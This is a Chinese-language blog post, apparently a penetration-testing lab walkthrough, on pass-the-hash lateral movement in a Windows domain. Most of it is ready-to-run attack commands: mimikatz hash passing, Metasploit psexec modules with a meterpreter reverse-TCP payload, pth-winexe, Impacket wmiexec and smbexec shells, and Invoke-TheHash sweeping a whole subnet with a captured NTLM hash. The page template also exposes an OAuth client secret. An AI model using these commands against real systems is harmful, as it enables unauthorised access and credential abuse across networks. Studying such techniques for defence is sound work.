<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    
    <title>凭据传递攻击(Path The Hash) | MyBlogs</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    
      <meta name="google-site-verification" content="XXX" />
    

    
        <meta property="algolia:search" data-application-id="T8IRMXQO87" data-api-key="614acade121cd1054c73da7b48c66120" data-index-name="test">
    

    

    

    
        <link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🎮</text></svg>">
    

    
    <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
    

    

    
<link rel="stylesheet" href="/dist/build.css?v=1637200696663.css">


    
<link rel="stylesheet" href="/dist/custom.css?v=1637200696663.css">


    <script>
        window.isPost = true
        window.aomori = {
            
            gitalk: {
                enable: true,
                clientID: "1e42dab70ec4e2fd8191",
                clientSecret: "f1affa73451031e968478d31426bde82f4526aed",
                repo: "git-comments",
                owner: "Hasaki-h2",
                admin: ["admin",],
                distractionFreeMode: true  // Facebook-like distraction free mode
            },
            
            
            
        }
        window.aomori_logo_typed_animated = true
        window.aomori_search_algolia = true

    </script>

<meta name="generator" content="Hexo 5.4.0"></head>

<body>

    <div class="container">
    <header class="header">
        <div class="header-type">
            
            <div class="header-type-avatar avatar avatar-sm">
                <img src="/images/avatar.jpg" alt="">
            </div>
            
            <div class="header-type-inner">
                
                    <div id="typed-strings" style="display:none">
                        <p>MyBlogs</p>
                    </div>
                    <a class="header-type-title" id="typed" href="/"></a>
                
    
                
            </div>
        </div>
        <div class="header-menu">
            <div class="header-menu-inner">
                
                <a href="/">Home</a>
                
                <a href="/archives">Archives</a>
                
            </div>
            <div class="header-menu-social">
                
    <a class="social" target="_blank" href="">
        <box-icon type='' name=''></box-icon>
    </a>

    <a class="social" target="_blank" href="">
        <box-icon type='' name=''></box-icon>
    </a>

            </div>
        </div>

        <div class="header-menu-mobile">
            <div class="header-menu-mobile-inner" id="mobile-menu-open">
                <i class="icon icon-menu"></i>
            </div>
        </div>
    </header>

    <div class="header-menu-mobile-menu">
        <div class="header-menu-mobile-menu-bg"></div>
        <div class="header-menu-mobile-menu-wrap">
            <div class="header-menu-mobile-menu-inner">
                <div class="header-menu-mobile-menu-close" id="mobile-menu-close">
                    <i class="icon icon-cross"></i>
                </div>
                <div class="header-menu-mobile-menu-list">
                    
                    <a href="/">Home</a>
                    
                    <a href="/archives">Archives</a>
                    
                </div>
            </div>
        </div>
    </div>

</div>

    <div class="container">
        <div class="main">
            <section class="inner">
                <section class="inner-main">
                    <div class="post">
    <article id="post-ckwdl6jod002sa84zdgkk1ft6" class="article article-type-post" itemscope
    itemprop="blogPost">

    <div class="article-inner">

        
          
        
        
        

        
        <header class="article-header">
            
  
    <h1 class="article-title" itemprop="name">
      凭据传递攻击(Path The Hash)
    </h1>
  

        </header>
        

        <div class="article-more-info article-more-info-post hairline">

            <div class="article-date">
  <time datetime="2021-01-29T08:07:37.000Z" itemprop="datePublished">2021-01-29</time>
</div>

            
            <div class="article-category">
                <a class="article-category-link" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a>,<a class="article-category-link" href="/categories/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">工具使用</a>
            </div>
            

            
            <div class="article-tag">
                <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Pth/" rel="tag">Pth</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Tools/" rel="tag">Tools</a></li></ul>
            </div>
            

            
            <div class="article-busuanzi">
                有 <span id="busuanzi_value_page_pv">N</span> 人看过
            </div>
            

        </div>

        <div class="article-entry post-inner-html hairline" itemprop="articleBody">
            <h2 id="一、PTH简介"><a href="#一、PTH简介" class="headerlink" title="一、PTH简介"></a>一、PTH简介</h2><p> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值，但是解不开明文。<span id="more"></span>这时我们可以利用NTLM认证的一种缺陷，利用用户的密码哈希值来进行NTLM认证。在域环境中，大量计算机在安装时会使用相同的本地管理员账号和密码。因此，如果计算机的本地管理员账号密码相同，攻击者就能使用哈希传递攻击登录内网中的其他机器。</p>
<h2 id="二、ColbaltStrike实现PTH"><a href="#二、ColbaltStrike实现PTH" class="headerlink" title="二、ColbaltStrike实现PTH"></a>二、ColbaltStrike实现PTH</h2><ol>
<li><p>获取windows server2003 的hashdump</p>
<p> <img src="https://img-blog.csdnimg.cn/20210129141103761.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
<li><p>PTH</p>
</li>
</ol>
<pre><code>&gt; mimikatz sekurlsa::pth /user:Administrator  /domain:shqax  /ntlm:7c813560a8c4dd6423eaecb4f820ae1d  /run:&quot;cmd.exe -w hidden&quot;

![在这里插入图片描述](https://img-blog.csdnimg.cn/20210129143352522.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70)
</code></pre>
<ol start="3">
<li><p>窃取令牌（PID），执行命令</p>
<p>  这里有个坑，win10使用的是SMB2，Windows server 2003 是SMB1,所以会查看目录失败。<br>  <img src="https://img-blog.csdnimg.cn/20210128161431476.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>  <img src="https://img-blog.csdnimg.cn/20210129143702220.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
</ol>
<ol start="4">
<li><p>PTH rdp</p>
<blockquote>
<p>mimikatz sekurlsa::pth /user:administrator /domain:XXX /ntlm:7c813560a8c4dd6423eaecb4f820ae1d /run:”mstsc.exe /restrictedadmin”  </p>
</blockquote>
<p>  这个没成功，因为RestrictedAdmin模式 配置不生效，还在找原因。<img src="https://img-blog.csdnimg.cn/20210128164247807.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
</ol>
<h2 id="三、使用MSF模块PTH"><a href="#三、使用MSF模块PTH" class="headerlink" title="三、使用MSF模块PTH"></a>三、使用MSF模块PTH</h2><h4 id="方法一、psexec-command"><a href="#方法一、psexec-command" class="headerlink" title="方法一、psexec_command"></a>方法一、psexec_command</h4><ol>
<li><p>使用模块<code>auxiliary/admin/smb/psexec_command</code></p>
<p>  <img src="https://img-blog.csdnimg.cn/20210128164923206.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
<li><p>参数设置</p>
</li>
</ol>
<pre><code><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">msf &gt; use auxiliary/admin/smb/psexec_command</span><br><span class="line">msf &gt; <span class="built_in">set</span> rhosts <span class="number">192.168</span>.<span class="number">2.200</span></span><br><span class="line">msf &gt; <span class="built_in">set</span> smbdomain SHQAX</span><br><span class="line">msf &gt; <span class="built_in">set</span> smbuser administrator</span><br><span class="line">msf &gt; <span class="built_in">set</span> smbpass <span class="number">00000000000000000000000000000000</span>:<span class="number">7</span>c813560a8c4dd6423eaecb4f820ae1d</span><br><span class="line">msf &gt; <span class="built_in">set</span> command whoami</span><br><span class="line">msf &gt; <span class="built_in">set</span> verbose true</span><br><span class="line">msf &gt; run</span><br></pre></td></tr></table></figure>
</code></pre>
<ol start="3">
<li><p>执行结果<br> <img src="https://img-blog.csdnimg.cn/20210129144311983.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br> 反向测试了下，windows server 2008 pth windows server2003, 其实是执行成功了，但是没回显，应该是文件读不到了，我猜是权限的问题，懂得大佬可以讲讲。<br> <img src="https://img-blog.csdnimg.cn/20210129144638843.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br> <img src="https://img-blog.csdnimg.cn/20210129144905129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h4 id="方法二、psexec-psh"><a href="#方法二、psexec-psh" class="headerlink" title="方法二、psexec_psh"></a>方法二、psexec_psh</h4></li>
<li><p>使用模块<code>exploit/windows/smb/psexec_psh</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msf <span class="operator">&gt;</span> use exploit<span class="operator">/</span>windows<span class="operator">/</span>smb<span class="operator">/</span>psexec_psh</span><br><span class="line">msf <span class="operator">&gt;</span> <span class="keyword">set</span> rhost <span class="number">192.168</span><span class="number">.2</span><span class="number">.200</span></span><br><span class="line">msf <span class="operator">&gt;</span> <span class="keyword">set</span> smbdomain SHQAX</span><br><span class="line">msf <span class="operator">&gt;</span> <span class="keyword">set</span> smbuser administrator</span><br><span class="line">msf <span class="operator">&gt;</span> <span class="keyword">set</span> smbpass <span class="number">00000000000000000000000000000000</span>:<span class="number">7</span>c813560a8c4dd6423eaecb4f820ae1d</span><br><span class="line">msf <span class="operator">&gt;</span> <span class="keyword">set</span> payload windows<span class="operator">/</span>x64<span class="operator">/</span>meterpreter<span class="operator">/</span>reverse_tcp_uuid</span><br><span class="line">msf <span class="operator">&gt;</span> <span class="keyword">set</span> lhost <span class="number">192.168</span><span class="number">.2</span><span class="number">.6</span></span><br><span class="line">msf <span class="operator">&gt;</span> <span class="keyword">set</span> lport <span class="number">4444</span></span><br><span class="line">msf <span class="operator">&gt;</span> run</span><br></pre></td></tr></table></figure></li>
<li><p>执行命令getuid<br>这里试了好几次才成功，最后一次是吧domain改为大写，会挤掉原来的账户，还是要慎用。<br><img src="https://img-blog.csdnimg.cn/20210129151036365.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
</ol>
<h2 id="四、使用kali工具进行PTH"><a href="#四、使用kali工具进行PTH" class="headerlink" title="四、使用kali工具进行PTH"></a>四、使用kali工具进行PTH</h2><ol>
<li><p>工具位置：<br><img src="https://img-blog.csdnimg.cn/2021012915170771.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>2、简单使用</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pth-winexe -U SHQAX/administrator%00000000000000000000000000000000:7c813560a8c4dd6423eaecb4f820ae1d --system --ostype=1 //192.168.2.200 cmd</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210129152131405.png" alt="在这里插入图片描述"></p>
</li>
</ol>
<h2 id="五、使用Impacket进行PTH"><a href="#五、使用Impacket进行PTH" class="headerlink" title="五、使用Impacket进行PTH"></a>五、使用Impacket进行PTH</h2><ol>
<li><p><strong>exe</strong> repo:<a target="_blank" rel="noopener" href="https://github.com/maaaaz/impacket-examples-windows">https://github.com/maaaaz/impacket-examples-windows</a></p>
<p> <strong>python</strong> repo:<a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket">https://github.com/SecureAuthCorp/impacket</a></p>
</li>
<li><p>简单使用</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmiexec -hashes 00000000000000000000000000000000:7c813560a8c4dd6423eaecb4f820ae1d SHQAX/administrator@192.168.2.200 <span class="string">&quot;whoami&quot;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210129154427330.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4OTYzMjQ2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>利用smbexec反弹shell：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbexec -hashes 00000000000000000000000000000000:7c813560a8c4dd6423eaecb4f820ae1d SHQAX/administrator@192.168.2.200</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210129154627615.png" alt="在这里插入图片描述"></p>
</li>
</ol>
<h2 id="六、使用power-shell进行PTH"><a href="#六、使用power-shell进行PTH" class="headerlink" title="六、使用power shell进行PTH"></a>六、使用power shell进行PTH</h2><ol>
<li>repo:<a target="_blank" rel="noopener" href="https://github.com/Kevin-Robertson/Invoke-TheHash">https://github.com/Kevin-Robertson/Invoke-TheHash</a></li>
<li>简单使用<br>本地加载powershell脚本<br><code>powershell -exec bypass</code><br><code>Import-Module .\Invoke-WMIExec.ps1</code><br><code>Import-Module .\Invoke-TheHash.ps1</code><br>利用已有hash，批量指定网段机器(域环境下)<br><code>Invoke-TheHash -Type WMIExec -TARGET 192.168.2.0/24 -Domain SHQAX -Username administrator -Hash 7c813560a8c4dd6423eaecb4f820ae1d</code><img src="https://img-blog.csdnimg.cn/20210129160026769.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210129160046907.png" alt="在这里插入图片描述"></li>
</ol>
<h2 id="七、参考链接"><a href="#七、参考链接" class="headerlink" title="七、参考链接"></a>七、参考链接</h2><ul>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/1802">https://xz.aliyun.com/t/1802</a></li>
<li><a target="_blank" rel="noopener" href="https://my.oschina.net/u/4587410/blog/4876510">https://my.oschina.net/u/4587410/blog/4876510</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/zpchcbd/p/11729691.html">https://www.cnblogs.com/zpchcbd/p/11729691.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/mrhonest/p/13361502.html">https://www.cnblogs.com/mrhonest/p/13361502.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/boltkiller/articles/4791307.html">https://www.cnblogs.com/boltkiller/articles/4791307.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.bilibili.com/read/cv7390347/">https://www.bilibili.com/read/cv7390347/</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/lhh134/article/details/104475026">https://blog.csdn.net/lhh134/article/details/104475026</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_30496751/article/details/94863034">https://blog.csdn.net/weixin_30496751/article/details/94863034</a></li>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/72190.html">https://www.secpulse.com/archives/72190.html</a></li>
<li><a target="_blank" rel="noopener" href="https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx">https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx</a></li>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/15757.html">https://www.freebuf.com/articles/system/15757.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/bmjoker/p/10529360.html">https://www.cnblogs.com/bmjoker/p/10529360.html</a></li>
<li><a target="_blank" rel="noopener" href="https://opensource-sec.com/2021/01/29/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B9%8BHash%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB/">https://opensource-sec.com/2021/01/29/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B9%8BHash%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB/</a></li>
</ul>

        </div>

    </div>

    

    

    

    
<div class="article-copyright hairline">
  <p>
    本作品采用 <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-nd/4.0/">知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议</a> 进行许可。
  </p>
</div>


    

    
<nav class="article-nav">
  
    <a href="/2021/02/19/LaZagne%E7%BC%96%E8%AF%91/" id="article-nav-newer" class="article-nav-link-wrap">
      <div class="article-nav-caption">下一篇</div>
      <div class="article-nav-title">
        
          LaZagne编译
        
      </div>
    </a>
  
  
    <a href="/2021/01/25/Mimikatz%E7%BC%96%E8%AF%91/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-caption">上一篇</div>
      <div class="article-nav-title">Mimikatz编译</div>
    </a>
  
</nav>


    <section class="share">
        <div class="share-title">分享</div>
        <a class="share-item" target="_blank"
            href="https://twitter.com/share?text=凭据传递攻击(Path The Hash) - MyBlogs&url=http://example.com/2021/01/29/%E5%87%AD%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB(Path%20The%20Hash)/">
            <box-icon type='logo' name='twitter'></box-icon>
        </a>
        <a class="share-item" target="_blank"
            href="https://www.facebook.com/sharer.php?title=凭据传递攻击(Path The Hash) - MyBlogs&u=http://example.com/2021/01/29/%E5%87%AD%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB(Path%20The%20Hash)/">
            <box-icon name='facebook-square' type='logo' ></box-icon>
        </a>
        <!-- <a class="share-item" target="_blank"
            href="https://service.weibo.com/share/share.php?title=凭据传递攻击(Path The Hash) - MyBlogs&url=http://example.com/2021/01/29/%E5%87%AD%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB(Path%20The%20Hash)/&pic=">
            <div class="n-icon n-icon-weibo"></div>
        </a> -->
    </section>

</article>






<section class="comments">
    <div id="gitalk-container"></div>
</section>







<script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

</div>
                </section>
            </section>

            
            <aside class="sidebar sidebar-search-fix">
                

    <div class="search">
    <div class="has-icon-right">
        <input type="text" class="form-input" id="search" placeholder="SEARCH" autocomplete="off">
        <div class="form-icon">
            <box-icon name='search' color="#3c4859"></box-icon>
        </div>
    </div>
    <div class="search-result" id="search-ps"></div>
</div>


<div class="widget" id="widget">
    
      
  <div class="widget-wrap">
    <div class="widget-inner">
      <div class="toc post-toc-html"></div>
    </div>
  </div>

    
      
  <div class="widget-wrap widget-cate">
    <div class="widget-title"><span>Categories</span></div>
    <div class="widget-inner">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web%E6%B8%97%E9%80%8F/">Web渗透</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">工具使用</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/">开发语言</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/">操作系统</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%95%B0%E6%8D%AE%E5%BA%93/">数据库</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9D%82%E9%A1%B9/">杂项</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%BA%AF%E6%BA%90%E5%8F%8D%E5%88%B6/">溯源反制</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/">环境配置</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91/">脚本开发</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%BF%90%E7%BB%B4/">运维</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap widget-tags">
    <div class="widget-title"><span>Tags</span></div>
    <div class="widget-inner">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/ARL/" rel="tag">ARL</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Access/" rel="tag">Access</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Bugku/" rel="tag">Bugku</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Burpsuite/" rel="tag">Burpsuite</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Cap-Pwd/" rel="tag">Cap_Pwd</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CobaltStrike/" rel="tag">CobaltStrike</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/GetShell/" rel="tag">GetShell</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Goby/" rel="tag">Goby</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Java/" rel="tag">Java</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Kali/" rel="tag">Kali</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Lfi/" rel="tag">Lfi</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Mysql/" rel="tag">Mysql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Oracle/" rel="tag">Oracle</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Proxy/" rel="tag">Proxy</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pth/" rel="tag">Pth</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RCE/" rel="tag">RCE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SSRF/" rel="tag">SSRF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Sql/" rel="tag">Sql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Tools/" rel="tag">Tools</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/VulLab/" rel="tag">VulLab</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Xff/" rel="tag">Xff</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Xray/" rel="tag">Xray</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap widget-recent-posts">
    <div class="widget-title"><span>Recent Posts</span></div>
    <div class="widget-inner">
      <ul>
        
          <li>
            <a href="/2021/11/18/hello-world/">Hello World</a>
          </li>
        
          <li>
            <a href="/2021/08/15/%E5%8F%8D%E5%88%B6Goby%E6%89%AB%E6%8F%8F%E4%B9%8BXSS%E7%82%B9%E5%87%BB%E4%B8%8A%E7%BA%BF/">反制Goby扫描之XSS点击上线</a>
          </li>
        
          <li>
            <a href="/2021/08/11/docx%E6%89%B9%E9%87%8F%E8%BD%ACmarkdown%E8%84%9A%E6%9C%AC%E5%88%86%E4%BA%AB/">docx批量转markdown脚本分享</a>
          </li>
        
          <li>
            <a href="/2021/08/02/CS%E5%88%86%E7%A6%BB%E5%85%8D%E6%9D%80%E5%AE%9E%E8%B7%B5/">CS分离免杀实践</a>
          </li>
        
          <li>
            <a href="/2021/06/17/WEB%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%9F%A5%E8%AF%86%E6%A2%B3%E7%90%86-%E6%B3%A8%E5%85%A5%E7%B1%BB-1-SQL%E6%B3%A8%E5%85%A5-Oracle/">渗透测试知识梳理-注入类-1-SQL注入-Oracle</a>
          </li>
        
      </ul>
    </div>
  </div>

    
      
  <div class="widget-wrap widget-archive">
    <div class="widget-title"><span>Archive</span></div>
    <div class="widget-inner">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/">2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/">2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/">2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/">2018</a></li></ul>
    </div>
  </div>


    
</div>

<div id="backtop"><i class="icon icon-arrow-up"></i></div>
            </aside>
            
        </div>
    </div>

    <footer class="footer">
    <div class="footer-wave">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1440 320"><path fill="#3c4859" fill-opacity="1" d="M0,160L60,181.3C120,203,240,245,360,240C480,235,600,181,720,186.7C840,192,960,256,1080,261.3C1200,267,1320,213,1380,186.7L1440,160L1440,320L1380,320C1320,320,1200,320,1080,320C960,320,840,320,720,320C600,320,480,320,360,320C240,320,120,320,60,320L0,320Z"></path></svg>
    </div>

    <div class="footer-wrap">
        <div class="footer-inner"> 
            MyBlogs &copy; 2021<br>
            Powered By Hexo · Theme By <a href="https://github.com/lh1me/hexo-theme-aomori" target="_blank">Aomori</a>
        </div>
    </div>

</footer>


<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>





<script src="/dist/build.js?1637200696663.js"></script>


<script src="/dist/custom.js?1637200696663.js"></script>



<!-- 百度链接提交 -->
<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        }
        else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>



<!-- Google Analytics-->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-XXXXX-X"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());
    gtag('config', 'UA-XXXXX-X');
</script>





</body>

</html>